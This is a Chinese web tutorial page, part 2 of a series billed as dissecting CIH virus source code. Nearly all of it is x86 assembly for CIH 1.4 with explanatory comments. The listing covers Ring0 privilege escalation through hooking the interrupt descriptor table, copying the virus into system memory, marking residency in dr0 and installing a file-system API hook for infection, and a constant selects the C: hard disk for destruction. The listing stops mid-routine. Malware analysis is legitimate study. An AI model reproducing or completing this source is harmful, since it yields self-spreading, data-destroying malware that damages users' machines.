首页 > 后端开发 > php教程 > 病毒程序源码实例剖析-CIH病毒[2]

病毒程序源码实例剖析-CIH病毒[2]

黄舟
发布: 2023-03-04 21:48:02
原创
2259 人浏览过

病毒程序源码实例剖析-CIH病毒[2]

OriginalAppEXE SEGMENT 
  
  ;PE格式可执行文件文件头
  FileHeader: 
  db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h 
  db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h 
  db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h 
  db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh 
  db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h 
  db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h 
  db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh 
  db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 
  db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h 
  db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah 
  db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h 
  db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h 
  db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h 
  db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
  db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h 
  db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h 
  db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  dd 00000000h, VirusSize 
  
  OriginalAppEXE ENDS 
  
  ; 病毒程序开始
  TRUE = 1 
  FALSE = 0 
  DEBUG = FALSE 
  
  ;标识其版本号为1.4版
  MajorVirusVersion = 1 ;主版本号 
  MinorVirusVersion = 4 ;次版本号 
  VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本号 
  
  IF DEBUG ;是否调试 
  FirstKillHardDiskNumber = 81h ;破坏D盘
  HookExceptionNumber = 05h ;使用5号中断 
  ELSE 
  FirstKillHardDiskNumber = 80h ;破坏C盘
  HookxceptionNumber = 03h ;使用3号中断 
  ENDIF 
  
  FileNameBufferSize = 7fh 
  
  ;病毒代码段开始 
  VirusGame SEGMENT 
  
  ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame 
  ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame 
  
  MyVirusStart: 
  push ebp 
  
  ;修改系统异常处理,避免产生错误提示信息 
  lea eax, [esp-04h*2] 
  xor ebx, ebx 
  xchg eax, fs:[ebx] 
  
  call @0 
  
  @0: 
  pop ebx ;获取程序起始偏移量,用此偏移量+相对偏移量获得绝对地址
  lea ecx, StopToRunVirusCode-@0[ebx] 
  push ecx 
  push eax 
  
  ; 修改中断描述表,以获得最高Ring0级权限 
  push eax 
  sidt [esp-02h] ;获得中断描述表的基址到ebx 
  pop ebx ; 
  
  add ebx, HookExceptionNumber*08h+04h ;计算要用中断的基址到ebx 
  
  cli ;在修改之前先关中断
  
  mov ebp, [ebx] ;获得异常处理的基址
  mov bp, [ebx-04h] ;获得入口
  
  lea esi, MyExceptionHook-@1[ecx] 
  
  push esi ;esi为病毒中断例程地址 
  
  mov [ebx-04h], si ; 
  shr esi, 16 ;修改异常 
  mov [ebx+02h], si ;修改中断基址使指向病毒中断例程 
  
  pop esi 
  
  ;生成进入ring0级的异常
  int HookExceptionNumber ;以中断的方式进入Ring0级 
  ReturnAddressOfEndException = $ 
  
  ; 合并所有病毒代码 
  push esi 
  mov esi, eax ;esi指向病毒开始处 
  
  ;循环进行复制 
  LoopOfMergeAllVirusCodeSection: 
  mov ecx, [eax-04h] 
  
  rep movsb ;复制病毒代码到分配好的系统内存首址 
  sub eax, 08h 
  mov esi, [eax] 
  or esi, esi 
  jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
  
  jmp LoopOfMergeAllVirusCodeSection ;复制下一段 
  
  QuitLoopOfMergeAllVirusCodeSection: 
  pop esi 
  int HookExceptionNumber 
  
  ; 保存异常处理 
  ReadyRestoreSE: 
  sti ;开中断 
  xor ebx, ebx 
  jmp RestoreSE 
  
  ; 当发生异常时,说明目前在Windows NT下,病毒将停止运行,直接跳转到原来程序
  StopToRunVirusCode: 
  @1 = StopToRunVirusCode 
  
  xor ebx, ebx 
  mov eax, fs:[ebx] 
  mov esp, [eax] 
  
  RestoreSE: 
  pop dword ptr fs:[ebx] 
  pop eax 
  
  ; 跳转到原来程序,正常执行 
  pop ebp 
  
  push 00401000h ; Push Original 
  OriginalAddressOfEntryPoint = $-4 ;把原程序的起始地址入栈
  ret ;以子程序返回形式返回到原程序的开始处
  ;病毒初始化模块
  MyExceptionHook: 
  @2 = MyExceptionHook 
  
  jz InstallMyFileSystemApiHook ;如果病毒代码已拷贝好了
  ;就转到安装系统钩子的程序 
  
  mov ecx, dr0 ;察看dr0是否设置过(dr0为病毒驻留标志)
  jecxz AllocateSystemMemoryPage ;没有设置,则分配系统内存 
  
  add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException 
  
  ;返回到原来的程序 
  ExitRing0Init: 
  mov [ebx-04h], bp ; 
  shr ebp, 16 ; Restore Exception 
  mov [ebx+02h], bp ;恢复原来的中断基址 
  
  iretd ;中断返回 
  
  ; 分配将要使用的系统内存
  AllocateSystemMemoryPage: 
  mov dr0, ebx ;设置病毒驻留的标志dr0
  push 00000000fh ; 
  push ecx ; 
  push 0ffffffffh ; 
  push ecx ;调用方法ULONG EXTERN _PageAllocate(ULONG nPages, 
  ;ULONG pType, ULONG VM, ULONG AlignMask, ULONG minPhys, 
  ;ULONG maxPhys, ULONG *PhysAddr,ULONG flags); 
  push ecx ; 
  push ecx ; 
  push 000000001h ; 
  push 000000002h ; 
  int 20h ; VXD调用
  _PageAllocate = $ 
  dd 00010053h ;使用eax、ecx、edx和flags寄存器
  add esp, 08h*04h ;恢复栈指针 
  
  xchg edi, eax ;edi指向分配好的系统内存首址 
  lea eax, MyVirusStart-@2[esi] ;eax指向病毒开始处 
  
  iretd ;退出中断 
  
  ; 初始化文件系统钩子
  InstallMyFileSystemApiHook: 
  lea eax, FileSystemApiHook-@6[edi] ;指向文件系统钩子程序首址 
  
  push eax ; 
  int 20h ; Vxd调用IFSMgr_InstallFileSystemApiHook 
  IFSMgr_InstallFileSystemApiHook = $ 
  dd 00400067h ;使用eax、ecx、edx和flags 寄存器
  
  mov dr0, eax ;保存原来的文件系统钩子程序首址到dr0
  pop eax ;eax等于文件系统钩子程序首址 
  
  ;保存原来的IFSMgr_InstallFileSystemApiHook功能调用的入口
  mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] 
  mov edx, [ecx] ;edx为IFSMgr_InstallFileSystemApiHook的入口 
  mov OldInstallFileSystemApiHook-@3[eax], edx 
  
  ; 修改IFSMgr_InstallFileSystemApiHook入口
  lea eax, InstallFileSystemApiHook-@3[eax] 
  mov [ecx], eax ;设置新的IFSMgr_InstallFileSystemApiHook功能调用的地址
  ;使指向InstallFileSystemApiHook 
  cli ;关中断

以上就是病毒程序源码实例剖析-CIH病毒[2]的内容,更多相关内容请关注PHP中文网(www.php.cn)!


相关标签:
来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板